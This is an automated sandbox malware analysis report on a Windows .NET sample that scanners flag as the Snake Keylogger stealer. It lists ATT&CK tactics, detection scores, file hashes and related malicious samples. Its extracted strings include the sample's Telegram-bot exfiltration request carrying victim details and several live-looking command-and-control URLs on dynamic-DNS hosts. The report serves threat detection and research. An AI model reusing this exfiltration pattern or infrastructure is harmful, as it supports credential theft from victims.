Command and Control: Web Service [1]; Encrypted Channel [11]; Ingress Tool Transfer [3]; Non-Application Layer Protocol [3]; Application Layer Protocol [14]; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

| Source | Detection | Scanner | Label |
|---|---|---|---|
| XFo9jVGyLQ.exe | 75% | Virustotal | |
| XFo9jVGyLQ.exe | 74% | ReversingLabs | Win32.Hacktool.Mimikatz |
| XFo9jVGyLQ.exe | 100% | Avira | TR/AD.SnakeStealer.pabgo |
                No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| reallyfreegeoip.org | 104.21.96.1 | true | false | | high |
| api.telegram.org | 149.154.167.220 | true | false | | high |
| checkip.dyndns.com | 132.226.247.73 | true | false | | high |
| checkip.dyndns.org | unknown | unknown | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high |
| http://checkip.dyndns.org/ | false | | high |
| https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20and%20Time:%2009/03/2025%20/%2000:29:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20887849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://www.office.com/ | XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C53000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://duckduckgo.com/ac/?q= | XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://api.telegram.org | XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://api.telegram.org/bot | XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high |
| https://www.ecosia.org/newtab/v20Y& | XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://tempuri.org/DataSet1.xsd | XFo9jVGyLQ.exe | false | | high |
| https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://ac.ecosia.org?q= | XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://checkip.dyndns.org | XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://chrome.google.com/webstore?hl=en4 | XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C31000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://api.telegram.org/bot/sendMessage?chat_id=&text= | XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://chrome.google.com/webstore?hl=en | XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C22000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://varders.kozow.com:8081 | XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high |
| https://chrome.google.com/webstore?hl=enlBNr | XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://aborters.duckdns.org:8081 | XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high |
| https://www.google.com/images/branding/product/ico/googleg_alldp.ico | XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.office.com/4 | XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C62000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20a | XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://anotherarmy.dns.army:8081 | XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high |
| https://duckduckgo.com/chrome_newtabv20 | XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://checkip.dyndns.org/q | XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high |
| https://reallyfreegeoip.org/xml/8.46.123.189$ | XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B18000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://reallyfreegeoip.org | XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.office.com/lBNr | XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://gemini.google.com/app?q= | XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high |
| https://reallyfreegeoip.org/xml/ | XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false |
| 104.21.96.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false |
| 132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false |
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1632400
Start date and time: 2025-03-07 23:21:17 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: XFo9jVGyLQ.exe (renamed because the original name is a hash value)
Original Sample Name: 44a234e2ebc159b044afa154f48b85f0a9634751638a7ca1f1a6817c5e3ffee1.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 101
• Number of non-executed functions: 44
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.199.214.10
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
| Time | Type | Description |
|---|---|---|
| 17:22:11 | API Interceptor | 11977407x Sleep call for process: XFo9jVGyLQ.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 149.154.167.220 | 44zFWmsOGn.exe | malicious | Snake Keylogger, VIP Keylogger | |
| | UqdykLLTA2.exe | malicious | Snake Keylogger, VIP Keylogger | |
| | GBYfjUz4a5.exe | malicious | GuLoader, Snake Keylogger | |
| | HCoITD94bW.exe | malicious | AgentTesla | |
| | g44YQtTyjN.exe | malicious | DarkCloud | |
| | OtldpQxzAw.exe | malicious | Snake Keylogger, VIP Keylogger | |
| | GuuQOl5kJR.exe | malicious | GuLoader, Snake Keylogger | |
| | hUMdKouQ1H.exe | malicious | GuLoader, Snake Keylogger | |
| | xnlP06YunJ.exe | malicious | AgentTesla | |
| | cqWZtEH4eJ.exe | malicious | GuLoader, Snake Keylogger | |
| 104.21.96.1 | A2h6QhZIKx.exe | malicious | Azorult | k1d5.icu/TP341/index.php |
| | DHL AWB Receipt_pdf.bat.exe | malicious | FormBook | www.rbopisalive.cyou/2dxw/ |
| | r_BBVA_MensajeSWIFT04-03-2025-PDF.exe | malicious | FormBook | www.kdrqcyusevx.info/k7wl/ |
| | MUH030425.exe | malicious | Azorult | k1d5.icu/TP341/index.php |
| | Invoice Remittance ref20250226.exe | malicious | FormBook | www.rbopisalive.cyou/a669/ |
| | 368c6e62-b031-5b65-fd43-e7a610184138.eml | malicious | HTMLPhisher | ce60771026585.oakdiiocese.org/r/74?session=770558a25b5d1fcbb8d81f113631d430f5b8d022cdc6d97cf6b16a412a3be9e6 |
| | PO.exe | malicious | Lokibot | touxzw.ir/sccc/five/fre.php |
| | OEoRzjI7JgSiUUd.exe | malicious | Lokibot | touxzw.ir/sss2/five/fre.php |
| | REQUEST FOR QUOTATION 2025.exe | malicious | FormBook | www.clouser.store/3r9x/ |
| | http://verification-center-00225526.iwantfoundation.org/ | malicious | Unknown | verification-center-00225526.iwantfoundation.org/banner-b1482d4c.webp |
| 132.226.247.73 | 44zFWmsOGn.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/ |
| | GBYfjUz4a5.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/ |
| | s6R3Xjt79e.exe | malicious | MSIL Logger, MassLogger RAT | checkip.dyndns.org/ |
| | GuuQOl5kJR.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/ |
| | l9inNHJqHS.exe | malicious | Snake Keylogger | checkip.dyndns.org/ |
| | tSftorqHTy.exe | malicious | MSIL Logger, MassLogger RAT | checkip.dyndns.org/ |
| | DayVXJx1km.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/ |
| | cexqIzhyvM.exe | malicious | GuLoader | checkip.dyndns.org/ |
| | drRbNknjyb.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/ |
| | pkNnK2ya0f.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/ |
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                reallyfreegeoip.org44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.112.1
                                                                                                                UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.80.1
                                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                sWr3wJ0SuB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 104.21.16.1
                                                                                                                OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.32.1
                                                                                                                BtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.80.1
                                                                                                                lvrHOgPXr5.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 104.21.16.1
                                                                                                                s6R3Xjt79e.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 104.21.64.1
                                                                                                                GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.64.1
                                                                                                                hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.48.1
                                                                                                                checkip.dyndns.com44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.130.0
                                                                                                                UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 132.226.247.73
                                                                                                                sWr3wJ0SuB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 158.101.44.242
                                                                                                                OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.130.0
                                                                                                                BtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                lvrHOgPXr5.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 193.122.6.168
                                                                                                                s6R3Xjt79e.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 132.226.247.73
                                                                                                                GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 132.226.247.73
                                                                                                                hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 193.122.130.0
                                                                                                                api.telegram.org44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                HCoITD94bW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                g44YQtTyjN.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                • 149.154.167.220
                                                                                                                OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                xnlP06YunJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                TELEGRAMRU44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                HCoITD94bW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                g44YQtTyjN.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                • 149.154.167.220
                                                                                                                OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                xnlP06YunJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                CLOUDFLARENETUS44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.112.1
                                                                                                                6KzB3ReZ6z.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 188.114.96.3
                                                                                                                UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.80.1
                                                                                                                3JZ4CUFqSs.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 188.114.96.3
                                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                HCoITD94bW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 104.26.12.205
                                                                                                                sWr3wJ0SuB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 104.21.16.1
                                                                                                                OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.32.1
                                                                                                                MmF9tcIj1J.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 104.21.87.37
                                                                                                                BtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.80.1
                                                                                                                UTMEMUS44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 132.226.247.73
                                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 132.226.247.73
                                                                                                                s6R3Xjt79e.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 132.226.247.73
                                                                                                                GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 132.226.247.73
                                                                                                                cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 132.226.8.169
                                                                                                                axN56TZ3PI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 132.226.8.169
                                                                                                                AEo2XQmxqZ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 132.226.8.169
                                                                                                                l9inNHJqHS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 132.226.247.73
                                                                                                                CWu89IbJQw.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 132.226.8.169
                                                                                                                tSftorqHTy.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 132.226.247.73
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                54328bd36c14bd82ddaa0c04b25ed9ad44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                sWr3wJ0SuB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 104.21.96.1
                                                                                                                OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                BtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                lvrHOgPXr5.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 104.21.96.1
                                                                                                                s6R3Xjt79e.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 104.21.96.1
                                                                                                                GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                3b5074b1b5d032e5620f69f9f700ff0e44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                HCoITD94bW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                SecuriteInfo.com.Program.Unwanted.5412.9015.527.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                ZWyrFp7WBM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                xnlP06YunJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                No context
Process: C:\Users\user\Desktop\XFo9jVGyLQ.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.760476071028119
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: XFo9jVGyLQ.exe
File size: 773'120 bytes
MD5: 414a4cce996061c8f67088e96b9e5745
SHA1: c6ed06b06aa148537fcc1ec9fcbb5f080519cea5
SHA256: 44a234e2ebc159b044afa154f48b85f0a9634751638a7ca1f1a6817c5e3ffee1
SHA512: 6cace3cc38c122d9e562f2d7398cfea5d0841db50f4c71d11fac96f53f8344527bcb921e15a5b29e9f5fffdebbc291fe1c06f9bc866a8ef661b69c5abaa71302
SSDEEP: 12288:tAbZWUBjSrr5FSRuSqwHLmPzdbXzBNdy7G3BW9DI1jh81bTDyRtl:mbYUUr5F+yPzffnQI1jhunDyrl
TLSH: 57F4F0D83B2AE716DD655A309A34EEB553A81DA8F000B9E35FCD3B87B9AD1015D0CF06
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. .......................@............@................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x4be0ba
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0xAD89030B [Wed Apr 5 04:39:39 2062 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
